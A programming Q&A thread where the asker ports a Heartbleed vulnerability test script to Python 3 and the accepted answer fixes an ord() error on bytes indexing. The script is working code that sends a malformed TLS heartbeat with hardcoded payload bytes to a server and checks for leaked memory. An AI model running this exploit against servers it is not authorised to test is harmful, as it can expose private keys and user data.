# Python3 understanding ord() in following script... “TypeError: ord() expected string of length 1, but int found”

Tags: python, python-3.x, heartbleed-bug

I have the following script, from a python 2.x based open project:

```
# Heavily based on the work of Jared Stafford 

import sys
import struct
import socket
import time
import select
import codecs

decode_hex = codecs.getdecoder('hex_codec')


def h2bin(x):
    return decode_hex(x.replace(' ', '').replace('\n', ''))[0]

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 00 01
aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa
aa aa aa aa aa aa aa aa  aa aa aa aa aa aa aa aa
''')


def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = b''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 1)
    if pay is None:
        return None, None, None
    return typ, ver, pay


def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return False

        if typ == 24:
            if len(pay) > 3:
                return True
            else:
                return False

        if typ == 21:
            return False


def test_heartbleed(url):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.stdout.flush()
    s.connect((url, 443))
    sys.stdout.flush()
    s.send(hello)
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            return
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    s.send(hb)
    return hit_hb(s)
```

The change to handle the script with Python3 was in:

```
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = b''
```

The rdata = **b**''

But if I call the script with an url, I get the following error:

> ord() expected string of length 1, but int found
>   Specific part:

```
if typ == 22 and ord(pay[0]) == 0x0E:
```

How can I handle this?

Thanks for every help!

Comment: I don't think this has anything to do with Python 3, the error is saying that `pay[0]` is an integer, not a string.

Comment: It has everything to do with Python 3. Indexing a `bytes` object returns an integer, not a character.

Answer (score 2, accepted):

Since you're working on raw binary data, rather than decoded text, and Python 3 makes a much more deliberate differentiation between those than Python 2 did, `ord` isn't the function you want anymore. It expects, as the error says, a length-1 *string*, and it will give you the number of the unicode codepoint (it *used* to give you the ASCII encoding of a single ASCII-range character).

Indexing into a bytes object now gives you the value of that byte *as an integer*, meaning all you need to do is this:

```
if typ == 22 and pay[0] == 0x0E:
```

You can confirm that this *is* the int you want like this:

```
>>> b'\x0E'[0] == 0x0E
True
```

Comment: I am probably like a blind cow in a field but for me if use .decode() on the result from my file.read it worked. In my case I had a Python2 file that io stream for reading and writing and for python 3 I had to use encode for writing and decode while reading ...

self.file_read = io.open("/dev/i2c-"+str(bus), "rb", buffering=0)

self.file_write = io.open("/dev/i2c-"+str(bus), "wb", buffering=0)

self.file_write.write(data.encode())

self.file_read.read(num_of_bytes).decode()

The .encode() and .decode() were for python3 version